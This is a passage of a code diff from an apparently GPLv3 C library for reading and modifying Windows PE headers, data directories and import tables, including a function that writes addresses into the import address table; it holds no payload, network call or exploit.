/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_time_date_stamp(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
self->file->TimeDateStamp = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_pointer_to_symbol_table(hdrs *self)
|
||||
{
|
||||
return self->file->PointerToSymbolTable;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_pointer_to_symbol_table(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
self->file->PointerToSymbolTable = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_number_of_symbols(hdrs *self)
|
||||
{
|
||||
return self->file->NumberOfSymbols;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_number_of_symbold(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
self->file->NumberOfSymbols = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint16_t hdrs_get_size_of_optional_header(hdrs *self)
|
||||
{
|
||||
return self->file->SizeOfOptionalHeader;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_size_of_optional_header(hdrs *self, uint16_t setVal)
|
||||
{
|
||||
self->file->SizeOfOptionalHeader = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint16_t hdrs_get_characteristics(hdrs *self)
|
||||
{
|
||||
return self->file->Characteristics;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_characteristics(hdrs *self, uint16_t setVal)
|
||||
{
|
||||
self->file->Characteristics = setVal;
|
||||
}
|
||||
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
// set and get functions for the optional hdr //
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_size_of_code(hdrs *self)
|
||||
{
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfCode;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_size_of_code(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfCode = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_size_of_initialized_data(hdrs *self)
|
||||
{
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfInitializedData;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_size_of_initialized_data(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfInitializedData = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_size_of_uninitialized_data(hdrs *self)
|
||||
{
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfUninitializedData;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_size_of_uninitialized_data(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfUninitializedData = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_address_of_entry_point(hdrs *self)
|
||||
{
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->AddressOfEntryPoint;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_address_of_entry_point(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->AddressOfEntryPoint = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_base_of_code(hdrs *self)
|
||||
{
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->BaseOfCode;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_base_of_code(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->BaseOfCode = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_base_of_data(hdrs *self)
|
||||
{
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->BaseOfData;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_base_of_data(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->BaseOfData = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint64_t hdrs_get_image_base(hdrs *self)
|
||||
{
|
||||
if (64 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->ImageBase;
|
||||
else if (32 == self->type)
|
||||
return (uint64_t)((IMAGE_OPTIONAL_HEADER32*)self->opt)->ImageBase;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_image_base(hdrs *self, uint64_t setVal)
|
||||
{
|
||||
if (64 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER64*)self->opt)->ImageBase = setVal;
|
||||
else if (32 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->ImageBase = (uint32_t)setVal;
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_section_alignment(hdrs *self)
|
||||
{
|
||||
if (64 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->SectionAlignment;
|
||||
else if (32 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->SectionAlignment;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_section_alignment(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
if (64 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER64*)self->opt)->SectionAlignment = setVal;
|
||||
else if (32 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->SectionAlignment = setVal;
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_file_alignment(hdrs *self)
|
||||
{
|
||||
if (64 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->FileAlignment;
|
||||
else if (32 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->FileAlignment;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_file_alignment(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
if (64 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER64*)self->opt)->FileAlignment = setVal;
|
||||
else if (32 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->FileAlignment = setVal;
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_size_of_image(hdrs *self)
|
||||
{
|
||||
if (64 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->SizeOfImage;
|
||||
else if (32 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfImage;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_size_of_image(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
if (64 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER64*)self->opt)->SizeOfImage = setVal;
|
||||
else if (32 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->SizeOfImage = setVal;
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_checksum(hdrs *self)
|
||||
{
|
||||
if (64 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->CheckSum;
|
||||
else if (32 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->CheckSum;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_checksum(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
if (64 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER64*)self->opt)->CheckSum = setVal;
|
||||
else if (32 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->CheckSum = setVal;
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_number_of_rva_and_sizes(hdrs *self)
|
||||
{
|
||||
if (64 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER64*)self->opt)->NumberOfRvaAndSizes;
|
||||
else if (32 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER32*)self->opt)->NumberOfRvaAndSizes;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_number_of_rva_and_sizes(hdrs *self, uint32_t setVal)
|
||||
{
|
||||
if (64 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER64*)self->opt)->NumberOfRvaAndSizes = setVal;
|
||||
else if (32 == self->type)
|
||||
((IMAGE_OPTIONAL_HEADER32*)self->opt)->NumberOfRvaAndSizes = setVal;
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
//other functions
|
||||
IMAGE_SECTION_HEADER *hdrs_get_first_section_header(hdrs *self)
|
||||
{
|
||||
void *ptr = (void *)self->dos;
|
||||
|
||||
ptr += self->dos->e_lfanew;
|
||||
if (64 == self->type)
|
||||
ptr += sizeof(IMAGE_NT_HEADERS64);
|
||||
else if (32 == self->type)
|
||||
ptr += sizeof(IMAGE_NT_HEADERS32);
|
||||
return (IMAGE_SECTION_HEADER*)ptr;
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_first_import_descriptor_rva(hdrs *self)
|
||||
{
|
||||
if (64 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER64 *)self->opt)->
|
||||
DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
|
||||
return ((IMAGE_OPTIONAL_HEADER32 *)self->opt)->
|
||||
DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_data_directory_import(hdrs *self,
|
||||
IMAGE_DATA_DIRECTORY *setVal)
|
||||
{
|
||||
if (64 == self->type)
|
||||
pic_memcpy(&((IMAGE_OPTIONAL_HEADER64 *)self->opt)
|
||||
->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT],
|
||||
setVal, sizeof (IMAGE_DATA_DIRECTORY));
|
||||
else
|
||||
pic_memcpy(&((IMAGE_OPTIONAL_HEADER32 *)self->opt)
|
||||
->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT],
|
||||
setVal, sizeof (IMAGE_DATA_DIRECTORY));
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_data_directory_iat(hdrs *self,
|
||||
IMAGE_DATA_DIRECTORY *setVal)
|
||||
{
|
||||
if (64 == self->type)
|
||||
pic_memcpy(&((IMAGE_OPTIONAL_HEADER64 *)self->opt)
|
||||
->DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT],
|
||||
setVal, sizeof (IMAGE_DATA_DIRECTORY));
|
||||
else
|
||||
pic_memcpy(&((IMAGE_OPTIONAL_HEADER32 *)self->opt)
|
||||
->DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT],
|
||||
setVal, sizeof (IMAGE_DATA_DIRECTORY));
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_load_cfg_rva(hdrs *self)
|
||||
{
|
||||
if (64 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER64 *)self->opt)
|
||||
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]
|
||||
.VirtualAddress;
|
||||
else
|
||||
return ((IMAGE_OPTIONAL_HEADER32 *)self->opt)
|
||||
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]
|
||||
.VirtualAddress;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_load_cfg_size(hdrs *self)
|
||||
{
|
||||
if (64 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER64 *)self->opt)
|
||||
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]
|
||||
.Size;
|
||||
else
|
||||
return ((IMAGE_OPTIONAL_HEADER32 *)self->opt)
|
||||
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]
|
||||
.Size;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_data_directory_load_cfg(hdrs *self,
|
||||
IMAGE_DATA_DIRECTORY *setVal)
|
||||
{
|
||||
if (64 == self->type)
|
||||
pic_memcpy(&((IMAGE_OPTIONAL_HEADER64 *)self->opt)
|
||||
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG],
|
||||
setVal, sizeof (IMAGE_DATA_DIRECTORY));
|
||||
else
|
||||
pic_memcpy(&((IMAGE_OPTIONAL_HEADER32 *)self->opt)
|
||||
->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG],
|
||||
setVal, sizeof (IMAGE_DATA_DIRECTORY));
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_export_directory(hdrs *self)
|
||||
{
|
||||
if (64 == self->type)
|
||||
return ((IMAGE_OPTIONAL_HEADER64 *)self->opt)->
|
||||
DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
|
||||
return ((IMAGE_OPTIONAL_HEADER32 *)self->opt)->
|
||||
DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
|
||||
}
|
||||
|
||||
//hdrs_destroy is empty till now
|
||||
void hdrs_destroy(hdrs *self)
|
||||
{
|
||||
return;
|
||||
}
|
||||
|
|
@ -0,0 +1,85 @@
|
|||
//License: GPLv3.0
|
||||
#ifndef HDRS
|
||||
#define HDRS
|
||||
|
||||
#include "../stdfuncs.h"
|
||||
|
||||
|
||||
#include <stdint.h>
|
||||
|
||||
//#include "pe.h"
|
||||
//#include "/usr/x86_64-w64-mingw32/include/windef.h"
|
||||
//#include "/usr/x86_64-w64-mingw32/include/winnt.h"
|
||||
|
||||
typedef struct _hdrs
|
||||
{
|
||||
char type; //32 or 64Bit?
|
||||
IMAGE_DOS_HEADER *dos;
|
||||
void *nt;
|
||||
IMAGE_FILE_HEADER *file;
|
||||
void *opt;
|
||||
}hdrs;
|
||||
|
||||
|
||||
//returns -1 on failure and 0 on success
|
||||
int hdrs_init(hdrs *self, void *image);
|
||||
|
||||
//set and get for file header
|
||||
uint16_t hdrs_get_machine_type(hdrs *self);
|
||||
uint16_t hdrs_get_number_of_sections(hdrs *self);
|
||||
void hdrs_set_number_of_sections(hdrs *self, uint16_t setVal);
|
||||
uint32_t hdrs_get_time_date_stamp(hdrs *self);
|
||||
void hdrs_set_time_date_stamp(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_pointer_to_symbol_table(hdrs *self);
|
||||
void hdrs_set_pointer_to_symbol_table(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_number_of_symbols(hdrs *self);
|
||||
void hdrs_set_number_of_symbold(hdrs *self, uint32_t setVal);
|
||||
uint16_t hdrs_get_characteristics(hdrs *self);
|
||||
void hdrs_set_characteristics(hdrs *self, uint16_t setVal);
|
||||
|
||||
//set and get for optional header
|
||||
uint32_t hdrs_get_size_of_code(hdrs *self);
|
||||
void hdrs_set_size_of_code(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_size_of_initialized_data(hdrs *self);
|
||||
void hdrs_set_size_of_initialized_data(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_size_of_uninitialized_data(hdrs *self);
|
||||
void hdrs_set_size_of_uninitialized_data(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_address_of_entry_point(hdrs *self);
|
||||
void hdrs_set_address_of_entry_point(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_base_of_code(hdrs *self);
|
||||
void hdrs_set_base_of_code(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_base_of_data(hdrs *self);
|
||||
void hdrs_set_base_of_data(hdrs *self, uint32_t setVal);
|
||||
uint64_t hdrs_get_image_base(hdrs *self);
|
||||
void hdrs_set_image_base(hdrs *self, uint64_t setVal);
|
||||
uint32_t hdrs_get_section_alignment(hdrs *self);
|
||||
void hdrs_set_section_alignment(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_file_alignment(hdrs *self);
|
||||
void hdrs_set_file_alignment(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_size_of_image(hdrs *self);
|
||||
void hdrs_set_size_of_image(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_checksum(hdrs *self);
|
||||
void hdrs_set_checksum(hdrs *self, uint32_t setVal);
|
||||
uint32_t hdrs_get_number_of_rva_and_sizes(hdrs *self);
|
||||
void hdrs_set_number_of_rva_and_sizes(hdrs *self, uint32_t setVal);
|
||||
|
||||
//data directorys
|
||||
uint32_t hdrs_get_first_import_descriptor_rva(hdrs *self);
|
||||
void hdrs_set_data_directory_import(hdrs *self,
|
||||
IMAGE_DATA_DIRECTORY *setVal);
|
||||
void hdrs_set_data_directory_iat(hdrs *self,
|
||||
IMAGE_DATA_DIRECTORY *setVal);
|
||||
uint32_t hdrs_get_load_cfg_rva(hdrs *self);
|
||||
uint32_t hdrs_get_load_cfg_size(hdrs *self);
|
||||
void hdrs_set_data_directory_load_cfg(hdrs *self,
|
||||
IMAGE_DATA_DIRECTORY *setVal);
|
||||
|
||||
uint32_t hdrs_get_export_directory(hdrs *self);
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
//section headers
|
||||
IMAGE_SECTION_HEADER *hdrs_get_first_section_header(hdrs *self);
|
||||
|
||||
|
||||
void hdrs_destroy(hdrs *self);
|
||||
#endif
|
|
@ -0,0 +1,185 @@
|
|||
//License: GPLv3.0
|
||||
#include "imports.h"
|
||||
|
||||
IMAGE_IMPORT_DESCRIPTOR *imports_by_index_get_import_descriptor(void *image, int idtIdx)
|
||||
{
|
||||
IMAGE_IMPORT_DESCRIPTOR *imp;
|
||||
hdrs h;
|
||||
|
||||
hdrs_init(&h, image);
|
||||
imp = (IMAGE_IMPORT_DESCRIPTOR*)rva_to_ptr(image,
|
||||
hdrs_get_first_import_descriptor_rva(&h));
|
||||
imp = &imp[idtIdx];
|
||||
if (-1 == test_for_list_end(imp, idtIdx, sizeof(IMAGE_IMPORT_DESCRIPTOR)))
|
||||
return NULL;
|
||||
return imp;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
char *imports_by_index_get_name(void *image, int idtIdx)
|
||||
{
|
||||
IMAGE_IMPORT_DESCRIPTOR *imp;
|
||||
imp = (IMAGE_IMPORT_DESCRIPTOR*)
|
||||
imports_by_index_get_import_descriptor(image, idtIdx);
|
||||
if (NULL == imp) return NULL;
|
||||
return (char *)rva_to_ptr(image, imp->Name);
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
int imports_by_name_get_index(void *image, const char *name)
|
||||
{
|
||||
int i = 0;
|
||||
char *currentName;
|
||||
do
|
||||
{
|
||||
currentName = imports_by_index_get_name(image, i);
|
||||
if (NULL == currentName)
|
||||
return -1;
|
||||
if (0 == pic_strncmp(currentName, name, pic_strlen(name)))
|
||||
return i;
|
||||
i++;
|
||||
}while(1);
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
int imports_by_name_get_iname_index_by_name(void *image, const char *dllName,
|
||||
const char *funcName)
|
||||
{
|
||||
int idtIdx;
|
||||
int intIdx;
|
||||
IMAGE_IMPORT_BY_NAME *currentIname;
|
||||
|
||||
idtIdx = imports_by_name_get_index(image, dllName);
|
||||
if (-1 == idtIdx) return -1;
|
||||
intIdx = 0;
|
||||
while (1)
|
||||
{
|
||||
currentIname = imports_by_index_get_iname_by_index(image, idtIdx,
|
||||
intIdx);
|
||||
if (NULL == currentIname) return -1;
|
||||
if (0 == pic_strncmp(currentIname->Name, funcName, pic_strlen(funcName)))
|
||||
return intIdx;
|
||||
intIdx++;
|
||||
}
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
IMAGE_IMPORT_BY_NAME *imports_by_index_get_iname_by_index(void *image,
|
||||
int idtIdx,
|
||||
int intIdx)
|
||||
{
|
||||
/*TODO: handling of IMAGE_ORDINAL_FLAG */
|
||||
IMAGE_IMPORT_DESCRIPTOR *imp;
|
||||
IMAGE_THUNK_DATA32 *thd32;
|
||||
IMAGE_THUNK_DATA64 *thd64;
|
||||
hdrs h;
|
||||
hdrs_init(&h, image);
|
||||
int i = 0;
|
||||
uint32_t firstThunkRva;
|
||||
|
||||
imp = imports_by_index_get_import_descriptor(image, idtIdx);
|
||||
if (NULL == imp) return NULL;
|
||||
firstThunkRva = imp->u1.OriginalFirstThunk;
|
||||
/* someone told me some linkers place the OriginalFirstThunk
|
||||
* wrongly into FirstThunk. This is how i tried to handle that. */
|
||||
if (0 == firstThunkRva) firstThunkRva = imp->FirstThunk;
|
||||
if (64 == h.type)
|
||||
{
|
||||
thd64 = (IMAGE_THUNK_DATA64*)rva_to_ptr(image, firstThunkRva);
|
||||
for (i = 0; i <= intIdx; i++)
|
||||
{
|
||||
if (0 == (&thd64[i])->u1.AddressOfData)
|
||||
break;
|
||||
}
|
||||
i--;
|
||||
if (i == intIdx)
|
||||
return (IMAGE_IMPORT_BY_NAME*)rva_to_ptr(image,
|
||||
(&thd64[intIdx])->u1.AddressOfData);
|
||||
else return NULL;
|
||||
}
|
||||
else if (32 == h.type)
|
||||
{
|
||||
thd32 = (IMAGE_THUNK_DATA32*)rva_to_ptr(image, firstThunkRva);
|
||||
for (i = 0; i <= intIdx; i++)
|
||||
{
|
||||
if (0 == (&thd32[i])->u1.AddressOfData)
|
||||
break;
|
||||
}
|
||||
i--;
|
||||
if (i == intIdx)
|
||||
return (IMAGE_IMPORT_BY_NAME*)rva_to_ptr(image,
|
||||
(&thd32[intIdx])->u1.AddressOfData);
|
||||
else return NULL;
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void *imports_by_index_get_iaddr_thunk_by_index(void *image, int idtIdx, int iatIdx)
|
||||
{
|
||||
IMAGE_IMPORT_DESCRIPTOR *imp;
|
||||
IMAGE_THUNK_DATA64 *thd64;
|
||||
IMAGE_THUNK_DATA32 *thd32;
|
||||
hdrs h;
|
||||
int i;
|
||||
hdrs_init(&h, image);
|
||||
|
||||
imp = imports_by_index_get_import_descriptor(image, idtIdx);
|
||||
|
||||
if (64 == h.type)
|
||||
{
|
||||
thd64 = (IMAGE_THUNK_DATA64*)rva_to_ptr(image, imp->FirstThunk);
|
||||
i = 0;
|
||||
while (i <= iatIdx)
|
||||
{
|
||||
if (i == iatIdx) return &thd64[i];
|
||||
i++;
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
else if (32 == h.type)
|
||||
{
|
||||
thd32 = (IMAGE_THUNK_DATA32*)rva_to_ptr(image, imp->FirstThunk);
|
||||
i = 0;
|
||||
while (i <= iatIdx)
|
||||
{
|
||||
if (i == iatIdx) return &thd32[i];
|
||||
i ++;
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void imports_by_index_set_iaddr_thunk_by_index(void *image, int idtIdx,
|
||||
int iatIdx, void *address)
|
||||
{
|
||||
IMAGE_THUNK_DATA32 *thd32;
|
||||
IMAGE_THUNK_DATA64 *thd64;
|
||||
hdrs h;
|
||||
|
||||
hdrs_init(&h, image);
|
||||
if (64 == h.type)
|
||||
{
|
||||
thd64 = imports_by_index_get_iaddr_thunk_by_index(image, idtIdx,
|
||||
iatIdx);
|
||||
thd64->u1.Function = (uint64_t)address;
|
||||
}
|
||||
if (32 == h.type)
|
||||
{
|
||||
thd32 = imports_by_index_get_iaddr_thunk_by_index(image, idtIdx,
|
||||
iatIdx);
|
||||
thd32->u1.Function = (uint32_t)address;
|
||||
}
|
||||
hdrs_destroy(&h);
|
||||
return;
|
||||
}
|
||||
|
|
@ -0,0 +1,94 @@
|
|||
//License: GPLv3.0
|
||||
/*! \file imports.h
|
||||
\brief These functions give you information about the import table.
|
||||
*/
|
||||
#ifndef IMPORTS_H
|
||||
#define IMPORTS_H
|
||||
|
||||
#include "hdrs.h"
|
||||
#include "sections.h"
|
||||
#include "misc.h"
|
||||
|
||||
/*! \fn IMAGE_IMPORT_DESCRIPTOR *imports_by_index_get_import_descriptor(
|
||||
void *image, int i)
|
||||
\brief return the import descriptor with the index i
|
||||
\param image points to the image you want to analyze
|
||||
\param i is 0 if you need the first import descriptor
|
||||
i = 1 for the second and so on
|
||||
*/
|
||||
IMAGE_IMPORT_DESCRIPTOR *imports_by_index_get_import_descriptor(void *image, int i);
|
||||
/*! \fn char *imports_by_index_get_name(void *image, int i)
|
||||
\brief returns a char *pointer on the import descriptors name (the dll name)
|
||||
\param image points tor the image you want to analyzee
|
||||
\param i is an index indicating which import disc.
|
||||
you want the name of (starting with 0)
|
||||
*/
|
||||
char *imports_by_index_get_name(void *image, int i);
|
||||
/*! \fn int imports_by_name_get_index(void *image, const char *name)
|
||||
\brief returns the import descroptor index that fits the name parameter
|
||||
\param image points on the image you want to analyze
|
||||
\param name the dll name (== import descriptor name) you want the idx of
|
||||
*/
|
||||
int imports_by_name_get_index(void *image, const char *name);
|
||||
/*! \fn imports_by_name_get_iname_index_by_name(void *image,
|
||||
const char *dllName,
|
||||
const char *funcName)
|
||||
\brief returns the index of the imported fucntion of a dll
|
||||
(that's not an ordinal)
|
||||
\param image points to the PE file you want information of
|
||||
\param dllName is the name of the dll (import descriptor name)
|
||||
where the function name resides in
|
||||
\param funcName is the name of the function you want the index of
|
||||
*/
|
||||
int imports_by_name_get_iname_index_by_name(void *image, const char *dllName,
|
||||
const char *funcName);
|
||||
/*! \fn IMAGE_IMPORT_BY_NAME *imports_by_index_get_iname_by_index(void *image,
|
||||
int idtIdx,
|
||||
int intIdx)
|
||||
\brief you give it two indexes (import descriptor and its import name table)
|
||||
and you get the name of the function these two indexes discribe.
|
||||
That means you will get the first function name of the first
|
||||
imported dll if idtIdx and intIdx are both == 0. The returned
|
||||
pointer is an IMAGE_IMPORT_BY_NAME struct which is actually
|
||||
a uint8_t array but with a word (16bit) value at its start.
|
||||
\param image points to the PE file
|
||||
\param idtIdx is the import descriptor index
|
||||
(starting at 0 for the first import descriptor)
|
||||
\param intIdx is the name table index (also starting with 0)
|
||||
*/
|
||||
IMAGE_IMPORT_BY_NAME *imports_by_index_get_iname_by_index(void *image,
|
||||
int idtIdx,
|
||||
int intIdx);
|
||||
/*! \fn void *imports_by_index_get_iaddr_thunk_by_index(void *image,
|
||||
int idtIdx,
|
||||
int iatIdx)
|
||||
\brief like imports_by_index_get_iname_by_index() but doesn't return a
|
||||
name but a pointer on IMAGE_THUNK_DATA if it's a 32bit executable
|
||||
this function will return IMAGE_THUNK_DATA32 and if you have 64bit
|
||||
you may use the return value as a pointer on IMAGE_THUNK_DATA64
|
||||
\param image is the PE file
|
||||
\param idtIdx is an import descriptor index
|
||||
\param iatIdx is the address table index
|
||||
*/
|
||||
void *imports_by_index_get_iaddr_thunk_by_index(void *image, int idtIdx, int iatIdx);
|
||||
|
||||
/*! \fn void imports_by_index_set_iaddr_thunk_by_index(void *image, int idtIdx,
|
||||
int iatIdx, void *address);
|
||||
\brief Writes an address into the specified field of the import address
|
||||
table.
|
||||
\param image is the PE file.
|
||||
\param idtIdx is the import descriptor index.
|
||||
\param iatIdx is the address table index.
|
||||
\param address is the address you want to write.
|
||||
*/
|
||||
|
||||
|
||||
void imports_by_index_set_iaddr_thunk_by_index(void *image, int idtIdx,
|
||||
int iatIdx, void *address);
|
||||
|
||||
/******* /*! \fn void *imports_by_index_get_iat(void *image, int i)
|
||||
\brief returns a
|
||||
|
||||
void *imports_by_index_get_iat(void *image, int i); */
|
||||
|
||||
#endif
|
|
@ -0,0 +1,27 @@
|
|||
//License: GPLv3.0
|
||||
#include "misc.h"
|
||||
|
||||
long align(long size, long align)
|
||||
{
|
||||
int alignBuffer = align;
|
||||
|
||||
while (alignBuffer < size)
|
||||
alignBuffer += align;
|
||||
return alignBuffer;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
/* this function tests for if index points behind
|
||||
* the terminating 0x00 element */
|
||||
int test_for_list_end(void *list, int index, int null_size_in_bytes)
|
||||
{
|
||||
